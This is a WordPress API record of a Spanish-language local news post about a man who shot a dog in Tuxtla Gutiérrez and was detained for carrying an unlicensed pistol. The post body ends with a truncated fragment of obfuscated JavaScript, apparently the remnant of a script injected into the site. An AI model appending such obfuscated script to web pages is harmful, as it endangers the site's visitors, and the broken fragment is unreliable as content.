{"id":12493,"date":"2023-11-09T02:57:35","date_gmt":"2023-11-09T02:57:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12493"},"modified":"2023-11-09T02:57:36","modified_gmt":"2023-11-09T02:57:36","slug":"balean-y-matan-a-canino-en-la-victoria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12493","title":{"rendered":"Balean y matan a canino en La Victoria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"461\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699492742122-461x1024.jpg\" alt=\"\" class=\"wp-image-12494\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699492742122-461x1024.jpg 461w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699492742122-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699492742122-692x1536.jpg 692w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699492742122.jpg 720w\" sizes=\"auto, (max-width: 461px) 100vw, 461px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 8 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la madrugada un sujeto baleo a un canino sobre la Calle 14 de Septiembre, y Fray Mat\u00edas de C\u00f3rdoba de la Colonia La Victoria de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando un sujeto identificado como Brayan de 22 a\u00f1os de edad, se\u00f1al\u00f3 a Jos\u00e9 Luis Jos\u00e9 Luis de 37 a\u00f1os de haber matado al perro.<\/p>\n\n\n\n<p>En el lugar la propietaria del canino Lucero de 31 a\u00f1os de edad, confirm\u00f3 este hecho que, se desconoce el motivo se esta agresi\u00f3n. Tras el arribo de la polic\u00eda, el responsable fue asegurado y al esculcarlo se le encontr\u00f3 una arma de fuego tipo escuadra calibre 380.<\/p>\n\n\n\n<p>Al no tener permiso de portaci\u00f3n qued\u00f3 detenido y puesto a disposici\u00f3n de la Fiscal\u00eda General de la Rep\u00fablica.<\/p>\n\n\n\n<p>Al lugar de los hechos arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes y levantamiento de los casquillos.<\/p>\n\n\n\n<p>Los uniformados recomendaron a la parte agraviada interponer la denuncia correspondiente por la muerte del can.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 8 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la madrugada un sujeto baleo a un canino sobre la Calle 14 de Septiembre, y Fray Mat\u00edas de C\u00f3rdoba de la Colonia La Victoria de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando un sujeto identificado como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12494,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12493","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12493","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12493"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12493\/revisions"}],"predecessor-version":[{"id":12495,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12493\/revisions\/12495"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12494"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12493"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12493"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}